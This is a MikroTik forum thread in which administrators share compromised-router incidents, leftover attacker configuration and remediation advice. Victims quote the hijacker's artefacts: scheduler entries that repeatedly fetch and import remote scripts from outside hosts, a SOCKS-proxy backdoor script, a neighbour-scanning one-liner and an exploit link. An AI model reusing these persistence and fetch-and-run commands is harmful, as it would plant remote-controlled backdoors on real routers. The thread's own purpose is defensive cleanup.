My multiple CCR router has been compromised. how to tackle this type of issue.


/ip firewall filter
add action=tarpit chain=input comment=\
"Add you ip addess to allow-ip in Address Lists." dst-port=30553 \
protocol=tcp
add action=add-src-to-address-list address-list=allow-ip \
address-list-timeout=1h chain=input comment=\
"The security flaw for Hajime is closed by the firewall." packet-size=\
1083 protocol=icmp
add action=accept chain=input comment=\
"Please update RotherOS and change password." src-address-list=allow-ip
add action=drop chain=input comment=\
" Thanks are accepted on WebMoney Z399578297824" dst-port=53 protocol=udp
add action=drop chain=input comment=\
"or BTC 14qiYkk3nUgsdqQawiMLC1bUGDZWHowix1" dst-port=\
53,8728,8729,21,22,23,80,443,8291 protocol=tcp
/system note
set note="The security flaw for Hajime is closed by the firewall. Please updat\
e RotherOS. Gratitude is accepted on WebMoney Z399578297824 or BTC 14qiYkk\
3nUgsdqQawiMLC1bUGDZWHowix1"

That's rather funny!

1) Restore your config to a backup version before you got hacked, update the firmware to the latest version
2) Keep your firmware updtodate. Don't use an easy to guess password.
3) Block non-established input traffic from the internet, especially control traffic, unless you know what you're doing. Even then be careful, an accident misconfiguration to say DNS or a web proxy and your router could be used for all sorts.

This doesn't look like someone who is trying to cover their tracks, just a vigilante concerned about people running unsafe configs/firmwares. It looks like they've used the same exploits that the HAJIME worm [0] used.

vulnerability that affects MikroTik RouterOS firmware 6.38.4 and earlier, and which allows attackers to execute code and take over the device. This vulnerability, called "Chimay Red", was one of the flaws included in the WikiLeaks "Vault 7" leak of alleged CIA hacking tools, and has also been used to compromise MikroTik routers by changing hostnames of vulnerable devices in the past year.

6.38.5 came out in March 2017 so you really should be patched.

What's new in 6.38.5 (2017-Mar-09 11:32):

!) www - fixed http server vulnerability;

[0] https://www.corero.com/blog/882-hajime- ... uters.html

We got hit with that too on a test router. I took a backup of it before I wiped and updated the firmware. The funny part was we had firmware 6.41.3 on ours and that was only 2 months behind.

I had the same invasion yesterday in version 6.40.4.

I was have the same issue today.

The compromised port and were the vulnerability get into my router was API 8728.

I got this because i'm checking dayly my routers, and the rules was placed 3 minutes before, and i got this in the log. the router that i have is a Lab router to catch this kind of issues:

This is what i get in my log before the script was uploaded. I log the mikrotik log into syslog server, that why i get this trace.

system, info, account user admin logged in from 37.193.69.238 via api

My admin password is 20 characters long and it contains alphanumeric characters, thats why is "impossible" to get Cracked. This password is not saved in winbox and i write it every time thati need to get into this router.

After that login, they disable log notifications, and put the rules published in this post. That occurs 20 minutes ago from this post.

Please check if you have Mikrotik API service activated and deactivate the service.

+ 1, also found this in one of our routers. We were scared when we saw it at the first time, but fortunatelly it seems that there were no bad-intentions at all.

We learnt something and will try to keep the routers updated / FW secured.

If you have anything Internet facing you must be vigilant.

Definition of vigilant
: alertly watchful especially to avoid danger

It is truly surprising that so many are:
1. Not up on the current threat landscape.
2. Fail to implement basic firewall restrictions on management services.
3. Show surprise when their poorly secured device is infiltrated.

#2 Would have prevented the Winbox vulnerability although its still important to update to a patched version that closes this hole.

hiI need help how I can use firewall on mikrotik ti block an application named (netshare). I use hotspot so so people use this app to share free internet to others. you can find it on google play and how it work. I see that this app use port 8282 and it give the client a diffrent ip which is 192.168.49.1/24
and I find in netshare setting the proxy port is
1024-65563
so, please help me to block it. I use a diffrent ways but I coud not stop this application

I had such kind of the invasion too.

And now i updated routerOS from 6.41 to 6.42.3. I changed all user's passwords and update my router from the backup which i had before the invasion.

But i find this string(screenshot) in the terminal window. What is it mean?

I had such kind of the invasion too.

And now i updated routerOS from 6.41 to 6.42.3. I changed all user's passwords and update my router from the backup which i had before the invasion.

But i find this string(screenshot) in the terminal window. What is it mean?

This note came from a backup when the routerboard was infected, just a note . Be calm, the board is no longer infected.
/system note edit note
Delete the text and ctrl with o for saving the changes!

I had such kind of the invasion too.

And now i updated routerOS from 6.41 to 6.42.3. I changed all user's passwords and update my router from the backup which i had before the invasion.

But i find this string(screenshot) in the terminal window. What is it mean?

This note came from a backup when the routerboard was infected, just a note . Be calm, the board is no longer infected.
/system note edit note
Delete the text and ctrl with o for saving the changes!

Thanks a lot. I did it and after rebooting this string disappeared.

You will have to decide for yourself if you trust that such people have only good intentions, and how well you are
able to check that they did not change anything else to your router than the firewall and the note.
At least check the users and the scripts sections to see if their are unexpected things.
Safest for sure is to netinstall the router and reconfigure it. Not by making a backup before netinstall and a restore
afterwards. You could do a /export before, manually search that for bad things and reconfigure the router from there.

But most important: you need to improve your firewall. Services like API, Telnet, SSH, Winbox and Webfig should
NOT be accessible from a random internet IP address. Preferably make them accessible only from the inside network
(so block them on the internet interface) but if this is impossible because all management is to be done from internet
at least use a list of allowed addresses or configure a VPN and allow management only via the VPN.

The compromised port and were the vulnerability get into my router was API 8728.
I got this because i'm checking dayly my routers, and the rules was placed 3 minutes before, and i got this in the log. the router that i have is a Lab router to catch this kind of issues:
This is what i get in my log before the script was uploaded. I log the mikrotik log into syslog server, that why i get this trace.
system, info, account user admin logged in from 37.193.69.238 via api
My admin password is 20 characters long and it contains alphanumeric characters, thats why is "impossible" to get Cracked.

That's quite concerning -- you were hacked via the API while running a recent firmware (more recent than v6.38.5)?

There was also a change in the "admin" password, ad there was a new user added, with name "Admin".

Several Mikrotiks got hacked yesterday so I have updated to ROS 6.40.8 and applied some ip services filter, and disable the http and https services and today I got hacked again the same messages
set note="The security flaw for Hajime is closed by the firewall. Please update RotherOS. Gratitude is accepted on WebMoney Z399578297824 or BTC 14qiYkk3nUgsdqQawiMLC1bUGD\
what ROS version is really stop this vulnerability ?

So many ports: viewtopic.php?f=21&t=134776&start=50#p665608 and have you checked which service ports are open?

Did you change also the username and password after the restore?

I know this may sound silly but it is quite important to ask - except from password change mentioned by Msatter, did you reset/reviewed whole configuration? If you just updated your ROS, added few firewall rules and left rest of config intact, there might be anything hidden. Even this message might be actually just leftover from previous hack. It is hard to say, but if there is suspicion, that vulnerability is still open, would be good to think about every possible option.

I know this may sound silly but it is quite important to ask - except from password change mentioned by Msatter, did you reset/reviewed whole configuration? If you just updated your ROS, added few firewall rules and left rest of config intact, there might be anything hidden. Even this message might be actually just leftover from previous hack. It is hard to say, but if there is suspicion, that vulnerability is still open, would be good to think about every possible option.

I did try my best to check what was in the new configuration and remove it before the update, and it didn't show immediately after the reload ,maybe it infected the backup file ?

maybe it infected the backup file ?

Do you restored from .backup file not from configuration backup (.rsc file)?

Check to see if you have the api enabled. Firewall if you need it. Disable if you don't. That is how they are accessing the device.

1. Cloud services should also be disabled
/ip cloud
set ddns-enabled=no
set update-time=no

2. Disable the services which are not required, Only winbox allowed
/ip service
set telnet disabled=yes
set ftp disabled=yes
set www disabled=yes
set ssh disabled=yes
set api disabled=yes
set api-ssl disabled=yes

3. Remove all files from the file list menu

ive dissected a few of these; resetting the config is not an option when working remote. Ive found that updating the firmware does not remove the bug though it does restore functionality. the bitcoin miner is actually running on the mikrotik; torch reveals no lan traffic but massive traffic and connections on the WAN interface. Ive found scripts, schedulers, memory log set to 1 line, allow remote requests(this was a problem before bitcoin); check your dns cache and if you see a bunch of crypto addresses your infected. Ive removed all the scripts, schedulers etc and closed all the holes but the miner is still running like its a part of the OS, need to be able to fix w/o wiping; any suggestions? blocking the offending IPs will result in a different offending IPs.

I am having this same issue on 6.38.5. I have been trying to update my router but it goes into a loop while updating to newest update. I have every service but winbox disabled and somehow FTP service goes to enable. I have deleted all the files. I have done every security trick that Mikrotik suggests to secure the router and nothing is working. What else can I do to prevent this while I try and figure out why I can not update.

Change the admin password and look for other users that shouldn’t be there; look for a user named “service”; delete it; look under scripts; delete everything; same in scheduler, disable web proxy; disable remote dns requests; delete all static dns entries(you’ll see a lot of bitcoin named urls); check the dns; use google 8.8.8.8; then you should be able to update; also you will need to set your log back to 100 under memory

What else can I do to prevent this while I try and figure out why I can not update.

Use the netinstall tool to install the newest version on the router and reset it to factory defaults.
Then re-configure it to your needs.
You can first look at the current configuration now to see how the external line is configured (e.g. PPPoE and its user/password),
but you should not use backup/restore or export/import to transfer the configuration or you risk copying something that makes it vulnerable again.

I had same kind of the invasion too.

My firmware is 6.43.3.

Solution to get access back: I just disabled all entries in /ip/firewall/filter by set [find chain="input"] disabled=yes .

And this is my new configuration (i hope i will be safe )
/ip service
set ftp disabled=yes
set www disabled=yes
set ssh address=192.168.0.0/16,10.0.0.0/8,172.16.0.0/12 disabled=no
set telnet disabled=yes
set api disabled=yes
set winbox address=192.168.0.0/16,10.0.0.0/8,172.16.0.0/12 disabled=no
set api-ssl disabled=yes

/ip firewall filter
add action=drop chain=input comment="Drop SSH Brute Forcers" dst-port=22 protocol=tcp src-address-list=ssh_blacklist
add action=add-src-to-address-list address-list=ssh_blacklist address-list-timeout=1d chain=input connection-state=new dst-port=22 protocol=tcp src-address-list=ssh_stage3
add action=add-src-to-address-list address-list=ssh_stage3 address-list-timeout=10m chain=input connection-state=new dst-port=22 protocol=tcp src-address-list=ssh_stage2
add action=add-src-to-address-list address-list=ssh_stage2 address-list-timeout=10m chain=input connection-state=new dst-port=22 protocol=tcp src-address-list=ssh_stage1
add action=add-src-to-address-list address-list=ssh_stage1 address-list-timeout=1m chain=input connection-state=new dst-port=22 protocol=tcp

/ip firewall filter
add action=drop chain=input comment="Drop Winbox Brute Forcers" dst-port=8291 protocol=tcp src-address-list=winbox_blacklist
add action=add-src-to-address-list address-list=winbox_blacklist address-list-timeout=1d chain=input connection-state=new dst-port=8291 protocol=tcp src-address-list=winbox_stage3
add action=add-src-to-address-list address-list=winbox_stage3 address-list-timeout=10m chain=input connection-state=new dst-port=8291 protocol=tcp src-address-list=winbox_stage2
add action=add-src-to-address-list address-list=winbox_stage2 address-list-timeout=10m chain=input connection-state=new dst-port=8291 protocol=tcp src-address-list=winbox_stage1
add action=add-src-to-address-list address-list=winbox_stage1 address-list-timeout=1m chain=input connection-state=new dst-port=8291 protocol=tcp


If any other help please share

Hamed

Please do NOT use the firewall posted above. It is incomplete, unnecessarily complex and will make the router at least vulnerable to DNS amplification attacks.

Use the default firewall from MikroTik's default configuration instead (with a default DROP rule on both input and forward chains for non-lan traffic).

you have to remove the scripts, firewall rules etc first otherwise it will just re-run and you'll be back at square one; then lock it down obviously

here is an example of the script; port number intentionally hidden

/ip firewall filter remove [/ip firewall filter find where comment ~ "port [0-9]*"];/ip socks set enabled=yes port=(any port number 0-65535 used to identify router) max-connections=500 connection-idle-timeout=30;/ip socks access remove [/ip socks access find];/ip firewall filter add chain=input protocol=tcp port=(any port number 0-65535 used to identify router) action=accept comment="port (any port number 0-65535 used to identify router) )";/ip firewall filter move [/ip firewall filter find comment="port (any port number 0-65535 used to identify router) "] 1;

any port number 0-65535 is used to identify router; the script will be different on every router for port number; if you post the number here they can identify you as im sure they are in this forum

if your bricked out there is a way to get back in

Also infosec is still stating that this exploit is a “mystery” and the bug came from the infamous wikileaks vault 7 cia tools; but it is very apparent that this bug turns your router into a dns server for bitcoin miners and also gathers other MikroTiks; it spreads very easily over cable and other consumer rated dsl networks. Here is the exploit for those interested:

https://www.exploit-db.com/exploits/44284/

It is also worth knowing that the MAC address connection tool can find other mikrotiks on huge dsl networks; ie comcast etc

So all that has to be disabled and you can only allow access from certain IPs; yes it has become a management nightmare

So all that has to be disabled and you can only allow access from certain IPs; yes it has become a management nightmare

In fact I had all that way before it even became known that there were vulnerabilities. It is just standard practice to allow management only from trusted networks/addresses.
It has not become a management nightmare, it just has become apparent that management has to be done in a reasonably secure manner.

Yes I agree but I get called to work on stuff I didn’t install and I’m faced with a lot of variables and the tools that I use to “hack” my way in are now obsolete; when you work remote factory resetting is not an option

Please do NOT use the firewall posted above. It is incomplete, unnecessarily complex and will make the router at least vulnerable to DNS amplification attacks.

Use the default firewall from MikroTik's default configuration instead (with a default DROP rule on both input and forward chains for non-lan traffic).

Thank you for your advice, i think i will use the default firewall and white-list some IP addresses.

After regaining control of my router, I could have these few remaining configurations of the hacker

/system scheduler
add interval=1d name=Auto113 on-event="/system scheduler remove [find name=upd111]\r\
\n/system reboot" policy=ftp,reboot,read,write,policy,test,password,sniff,sensitive start-date=sep/22/2018 start-time=03:11:00
add name=upd112 on-event="/system scheduler remove [find name=sh113]\r\
\n:do {/file remove u113.rsc} on-error={}" policy=ftp,reboot,read,write,policy,test,password,sniff,sensitive start-time=startup
add interval=12h name=upd114 on-event=":do {/tool fetch url=http://88.99.66.31/1DFrN6 mode=http keep-result=no} on-error={}" policy=\
ftp,reboot,read,write,policy,test,password,sniff,sensitive start-date=oct/14/2018 start-time=14:51:48
add interval=6h name=upd113 on-event=":do {/tool fetch url=\"http://min01.net:31416/min01\?key=CBGmW ... &port=8291\" mode=http dst-path=u113.rsc} on-er\
ror={}\r\
\n:do {/tool fetch url=\"http://min01.com:31416/mikr0tik\?key=CB ... &port=8291\" mode=http dst-path=u113.rsc} on-error={}\r\
\n:do {/tool fetch url=\"http://gotan.bit:31416/up0\?key=CBGmWcZ ... &port=8291\" mode=http dst-path=u113.rsc} on-error={}\r\
\n:do {/import u113.rsc} on-error={}\r\
\n:do {/file remove u113.rsc} on-error={}" policy=ftp,reboot,read,write,policy,test,password,sniff,sensitive start-date=oct/31/2018 start-time=02:54:02

/system script
add dont-require-permissions=no name=script5_ owner=monitor policy=ftp,reboot,read,policy,test,password,sensitive source=\
"/tool fetch address=178.32.120.230[ port=3666 src-path=/update mode=http keep-result=no"


and this code in a file named r1.rsc

/foreach m in=[/ip neighbor find where platform~"MikroTik"] do={/put ([/ip neighbor get $m version]." ".[/ip neighbor get $m software-id]." ip=".[/ip neighbor get $m address4] )}

i think the hacker is verifying all Mikrotik old version to hack.

Yes delete that stuff; there should be no scripts or schedulers

new update; once you shut the dns resolver down and remove the scripts they retaliate with what appears to be an amplified ddos attack but not? DNS resolver is not allowing remote requests and the ports used are obscure TCP ports; ie. 42499, 32386, etc, and somehow the router is transmitting huge amounts of data to these obscure Public addresses on these weird port numbers. I actually have to block the port to get it to stop. I have disallowed unestablished connections and locked them down tight but somehow the WAN interface is transmitting huge amounts of traffic 0 traffic on LAN; . All service ports are disabled, there are no files, cloud disabled, web proxy disabled, bandwidth test disabled, everything disabled and locked down tight. I cannot figure out how this is happening. I have seen this happen on 3 different routers in 3 different locations after the bitcoin miner was disabled on the router. The question is; how is this possible??? why is the router generating 1Mb of traffic and transmitting it to unknown IPs on weird ports???

I have disallowed unestablished connections and locked them down tight

That is basic firewall rule and you should have this in first place.

I cannot figure out how this is happening.

In that case best course of action would be hiring networking professional, give him access to router and let him figure out what is happening.

The question is; how is this possible??? why is the router generating 1Mb of traffic and transmitting it to unknown IPs on weird ports???

Wrong question to wrong people. You are in control of router and all connections. You can track connections and figure out WHERE it really originates, you can capture packets and look into them to figure out WHAT is being transmitted.
Any answer you get here is going to be just a guess because nobody around has access to your device and nobody can tell you what is exactly happening.

Universal answer without detailed analysis for any infected router is:

1. export config and save it
2. disconnect device from networks
3. netinstall (with new version without known vulnerabilities)
4. check config line-by-line and remove any harmful stuff
5. import config or create it from scratch
6. make sure your router is secure
7. make sure that you are using different password than previously
8. only as a last step, connect it back to network.

no tx traffic bc I blocked that port number but im sure it will change; why is the mikrotik processing these packets???

@vecernik87 I am a network pro and certified in MikroTik; I am the one they hired; I did not install originally; not much help are you?? I touch hundreds of these devices every year ; but the question remains even with your insults; if the MikroTik is locked down why is it processing unknown packets from unknown addresses

Again if I factory reset remote I would need to take a flight; so not an option

sometimes the regurgitated cookie cutter approach does not work for all situations; the fact is some of these mikrotiks got a bug and now we have to clean it up regardless of the circumstances. Ive been using this stuff for over 15 years and I cannot control how other people configure their networks initially and then meet me and ask me to fix it. You answer does not apply.

This forum is here for us to help each other

There was not a single insult in my post. On the contrary, you just called me an "i***t".
If you consider my help as insult, I will not do the mistake again. Hopefully, someone else will come with better help.
Have a great day.